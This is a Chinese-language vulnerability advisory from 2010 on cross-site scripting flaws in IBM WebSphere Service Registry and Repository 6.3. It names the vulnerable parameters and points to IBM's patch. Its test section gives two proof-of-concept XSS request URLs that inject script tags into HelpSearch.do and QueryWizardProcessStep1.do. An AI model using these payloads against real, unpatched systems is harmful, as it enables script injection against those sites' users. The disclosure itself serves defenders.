IBM WebSphere Service Registry and Repository多个跨站脚本漏洞

我就是一条龙

发布日期：2010-08-06
更新日期：2010-08-09

受影响系统：
IBM WebSphere Service Registry and Repository 6.3
描述：
BUGTRAQ  ID: 42281

WebSphere Service Registry and Repository是用于存储、访问和管理信息（通常是指服务元数据）的系统。

当queryConditionGroupType设置为AND的时候，WebSphere Service Registry and Repository没有正确地过滤提交给ServiceRegistry/HelpSearch.do的searchTerm参数和提交给ServiceRegistry/QueryWizardProcessStep1.do的queryItems[0].value参数便返回给了用户，这可能导致跨站脚本攻击。

<*来源：IBM （ncsupp@ca.ibm.com）
  
  链接：http://secunia.com/advisories/40862/
*>

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
/ServiceRegistry/HelpSearch.do?searchTerm=%22><script>alert%28%22XSS%22%29</script><
/ServiceRegistry/QueryWizardProcessStep1.do?queryConditionGroupType=AND&queryItems[0].value=<script>alert%28%27XSS%27%29</script>&queryItems[1].value=&queryItems[2].value=&queryItems[3].value=&queryItems[4].value=&wizard.button.setClassification=&wizard.button.next=Next

建议：
厂商补丁：

IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www-01.ibm.com/support/docview.wss?uid=swg1IZ76926